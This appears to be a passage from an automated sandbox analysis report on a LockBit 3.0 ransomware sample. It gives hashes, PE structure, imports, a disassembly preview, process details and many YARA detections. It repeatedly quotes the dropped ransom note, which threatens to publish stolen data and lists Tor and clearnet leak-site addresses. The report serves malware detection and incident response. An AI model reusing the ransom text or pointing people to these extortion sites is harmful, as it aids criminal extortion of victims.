                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\VirtualStore\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\Videos\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.256108673548852
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.94%
                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:157184
                MD5:4e52098915028fb63cf4f1205a1730fa
                SHA1:719b2a14e70d2913fd4ec4c403a586741fe64a10
                SHA256:367f5b45da98215ff297e0856e4a961c9e831e4f06457f16453f60d0cf407449
                SHA512:9163fe4923f76a4bc14ab3bdf4e4bcb06daabde494a5b94ad4e078bc98ef7652d0ab9c467aa202b31e08d30c2528d2a2d50e18effa9a4b3daa418dcc53dacbda
                SSDEEP:3072:oqJogYkcSNm9V7D3f4JvbK7ggULdcPuQMaoT:oq2kc4m9tDv4pbOULSaa
                TLSH:08E37C21B15ED0B3C47718F22726B17DB3EA4D2C1AA57843EAD80F48BCA59232F4595F
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....!c............................o.............@..................................B....@...........@....................

                File Icon

                Icon Hash:00828e8e8686b000

                Static PE Info

                General

                Entrypoint:0x41946f
                Entrypoint Section:.itext
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Time Stamp:0x632112B1 [Tue Sep 13 23:30:57 2022 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:914685b69f2ac2ff61b6b0f1883a054d

                Entrypoint Preview

                Instruction
                nop
                nop word ptr [eax+eax+00000000h]
                call 00007F862074E445h
                nop word ptr [eax+eax+00000000h]
                call 00007F862073B7D2h
                nop word ptr [eax+eax+00h]
                call 00007F862073ED8Bh
                nop word ptr [eax+eax+00000000h]
                call 00007F862074C7D0h
                nop word ptr [eax+eax+00000000h]
                push 00000000h
                call dword ptr [004255C8h]
                nop dword ptr [eax+eax+00h]
                call 00007F862074E129h
                call 00007F862074E12Ah
                call 00007F862074E10Dh
                call 00007F862074E10Eh
                call 00007F862074E127h
                call 00007F862074E11Ch
                call 00007F862074E105h
                call 00007F862074E11Eh
                call 00007F862074E107h
                call 00007F862074E102h
                call 00007F862074E0E5h
                call 00007F862074E0B6h
                call 00007F862074E0CFh
                call 00007F862074E0B2h
                call 00007F862074E0C5h
                call 00007F862074E0C6h
                call 00007F862074E0A9h
                call 00007F862074E0BCh
                call 00007F862074E0ABh
                call 00007F862074E0A0h
                call 00007F862074E0A7h
                call 00007F862074CBF8h
                call 00007F862074CC05h
                call 00007F862074CC12h

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x1a2300x50.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x290000xfcc.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x1a1200x1c.rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x1a0000x70.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x17d460x17e00False0.48270819698952877data6.613530972543989IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .itext0x190000x5690x600False0.255859375data3.0389614741823974IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x1a0000x4b20x600False0.3821614583333333data3.6588662154359954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x1b0000xadc80xa000False0.982666015625SysEx File -7.987450925445797IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .pdata0x260000x26800x2800False0.96767578125data7.894242298434305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .reloc0x290000xfcc0x1000False0.8427734375GLS_BINARY_LSB_FIRST6.728533295109IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Imports

                DLLImport
                gdi32.dllSetPixel, GetPixel, SelectPalette, SelectObject, GetTextColor, BitBlt, GetDeviceCaps, CreateSolidBrush, CreateFontW, CreateDIBitmap
                USER32.dllLoadMenuW, LoadImageW, CreateDialogParamW, CreateWindowExW, DefWindowProcW, GetDlgItem, IsDlgButtonChecked
                KERNEL32.dllGetLastError, GetProcAddress, GetModuleHandleA, GetLocaleInfoW, FreeLibrary, GetFileAttributesW, GetCommandLineW, GetCommandLineA

                Network Behavior

                No network behavior found

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:02:43:05
                Start date:28/10/2022
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\Desktop\file.exe
                Imagebase:0xd00000
                File size:157184 bytes
                MD5 hash:4E52098915028FB63CF4F1205A1730FA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.348122024.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.351537079.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.340156127.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.348024418.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.292192937.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.349559365.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.348832015.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.292387781.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.346819271.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.338417784.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.347646361.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.343481950.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.255049359.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.340798711.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.282860420.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.273489239.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.292554044.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.297465738.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.274717838.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.337458981.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.269253188.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.293411292.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.364401035.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.255115370.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.290082235.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.349404607.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.314755540.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.356750745.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.288601276.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.346667306.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.292935672.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.342008651.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.387083912.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.272063819.00000000008ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.290827308.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.259443381.00000000008ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.288202295.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.269612898.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.289322188.0000000000924000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.346934255.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.294687063.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.273212951.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.346630449.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.296732900.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.294197456.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.343155574.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.347895746.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.350432611.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.259689942.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.346786494.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.294865886.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.293134842.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.296463118.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.295822697.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.289232376.0000000000923000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.346199397.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.348707652.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.290624432.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.347861646.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.352252474.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.289923421.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.297159036.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
